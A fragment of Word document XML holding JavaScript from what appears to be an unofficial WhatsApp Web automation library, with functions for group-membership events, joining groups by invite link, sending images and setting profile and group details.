        </w:rPr>
        <w:t xml:space="preserve">        "remove",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "leave",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "promote",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        "demote"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chat = window.Store.Chat.get(groupId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //attach all group Participants to the events object as 'add'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const metadata = window.Store.GroupMetadata.get(groupId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!groupParticpiantsEvents[groupId]) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        groupParticpiantsEvents[groupId] = {};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        metadata.participants.forEach(participant =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            groupParticpiantsEvents[groupId][participant.id.toString()] = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                subtype: "add",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                from: metadata.owner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i = 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    chat.on("change:groupMetadata.participants",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        _ =&gt; chat.on("all", (x, y) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { isGroup, previewMessage } = y;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (isGroup &amp;&amp; x === "change" &amp;&amp; previewMessage &amp;&amp; previewMessage.type === "gp2" &amp;&amp; subtypeEvents.includes(previewMessage.subtype)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                const { subtype, author, recipients } = previewMessage;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                const rec = recipients[0].toString();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (groupParticpiantsEvents[groupId][rec] &amp;&amp; groupParticpiantsEvents[groupId][recipients[0]].subtype == subtype) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    //ignore, this is a duplicate entry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    // console.log('duplicate event')</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//ignore the first message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if (i == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        //ignore it, plus 1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        i++;</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groupParticpiantsEvents[groupId][rec] = { subtype, author };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        //fire the callback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        // // previewMessage.from.toString()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        // x removed y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        // x added y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        callback({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                            by: author.toString(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                            action: subtype,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                            who: recipients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chat.off("all", this)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        i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Registers a callback that fires when your host phone is added to a group.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param callback - function - Callback function to be called when a message acknowledgement changes. The callback returns 3 variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns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window.WAPI.onAddedToGroup = function (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Store.Chat.on('change:previewMessage', async event =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (event.isGroup &amp;&amp; event.previewMessage &amp;&amp; event.previewMessage.type == 'gp2' &amp;&amp; event.previewMessage.subtype == 'add' &amp;&amp; event.previewMessage.recipients &amp;&amp; event.previewMessage.recipients.map(x =&gt; x._serialized).includes(Store.Me.wid._serialized)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const tdiff = (Date.now() - Store.Msg.get(event.previewMessage.id._serialized).t * 1000) / 1000;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (tdiff &lt; 10.0) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                console.log('added', tdiff, 'seconds ago')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                await WAPI.sendSeen(event.id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                callback(WAPI._serializeChatObj(Store.Chat.get(event.id)));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            } else console.log('Not a new group add', event.id._serialized)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Reads buffered new messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns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window.WAPI.getBufferedNewMessages = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let bufferedMessages = window._WAPI._newMessagesBuffer;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    window._WAPI._newMessagesBuffer = [];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return bufferedMessages;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End new messages observable functions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Joins a group via the invite link, code, or message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param link This param is the string which includes the invite link or code. The following work:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - Follow this link to join my WA group: https://chat.whatsapp.com/DHTGJUfFJAV9MxOpZO1fBZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - https://chat.whatsapp.com/DHTGJUfFJAV9MxOpZO1fBZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * - DHTGJUfFJAV9MxOpZO1fBZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns Promise&lt;string | boolean&gt; Either false if it didn't work, or the group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window.WAPI.joinGroupViaLink = async function (link) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await Store.WapQuery.acceptGroupInvite(link.split('\/').pop()).then(res =&gt; res.status === 200 ? res.gid._serialized : res.status);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let code = link;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    //is it a link? if not, assume it's a code, otherwise, process the link to get the code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (link.includes('chat.whatsapp.com')) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (!link.match(/chat.whatsapp.com\/([\w\d]*)/g).length) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        code = link.match(/chat.whatsapp.com\/([\w\d]*)/g)[0].replace('chat.whatsapp.com\/',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group = await Store.GroupInvite.joinGroupViaInvite(code);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!group.id) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return group.id._serialized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window.WAPI.sendImage = async function (imgBase64, chatid, filename, caption, quotedMsg, waitForKey, ptt) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!chatid.includes('@g') &amp;&amp; !chatid.includes('@c')) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let extras = {};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (quotedMsg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (typeof quotedMsg !== "object") quotedMsg = Store.Msg.get(quotedMsg);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        extras = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            quotedMsg,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            quotedParticipant: quotedMsg.author || quotedMsg.from,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            quotedStanzaID: quotedMsg.id.id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await Store.Chat.find(chatid).then(async (chat) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        var mediaBlob = window.WAPI.base64ImageToFile(imgBase64, filename);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return await window.WAPI.procFiles(chat, mediaBlob).then(async mc =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            var media = mc.models[0];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (ptt) media.mediaPrep._mediaData.type = 'ptt';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            await media.sendToChat(chat, { caption, ...extras });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return waitForKey ? await new Promise(async (resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                const cb = msg =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if (media.attributes.file.size === msg.size) resolve(msg.id._serialized);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    Store.Msg.off('change:clientUrl', cb);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Store.Msg.on('change:clientUrl', cb);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            }) :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function sts the profile name of the number.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note this DOES NOT WORK ON BUSINESS ACCOUNTS!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@param newName - string the new name to set as profile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window.WAPI.setMyName = async function (newName) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return require("WAWebSetPushnameConnAction").setPushname(newName)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Change the icon for the group chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param groupId 123123123123_1312313123@g.us The id of the group</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param imgData 'data:image/jpeg;base64,...` The base 64 data uri</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns boolean true if it was set, false if it didn't work. It usually doesn't work if the image file is too big.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window.WAPI.setGroupIcon = async function (groupId, imgData) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
